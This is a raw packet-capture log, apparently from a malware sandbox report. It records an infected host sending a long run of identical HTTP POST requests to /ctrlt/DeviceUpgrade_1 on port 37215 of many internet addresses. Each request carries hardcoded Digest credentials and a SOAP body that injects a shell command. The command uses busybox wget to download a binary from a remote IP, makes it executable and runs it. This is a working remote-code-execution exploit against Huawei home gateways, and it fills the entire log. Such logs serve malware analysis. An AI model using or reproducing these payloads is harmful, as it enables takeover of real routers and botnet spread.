                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2014192.168.2.155507241.103.159.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102226973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2015192.168.2.1543690222.188.124.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102263927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2016192.168.2.1543582222.192.68.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102267027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2017192.168.2.1534818197.77.220.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102273941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2018192.168.2.1534256156.103.76.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102303982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2019192.168.2.1543674156.185.115.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102305889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2020192.168.2.15467604.58.46.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102444887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2021192.168.2.155345694.220.73.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102446079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2022192.168.2.1535058122.160.81.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102447033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2023192.168.2.155317037.70.156.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102456093 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2024192.168.2.1559752102.137.194.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102494001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
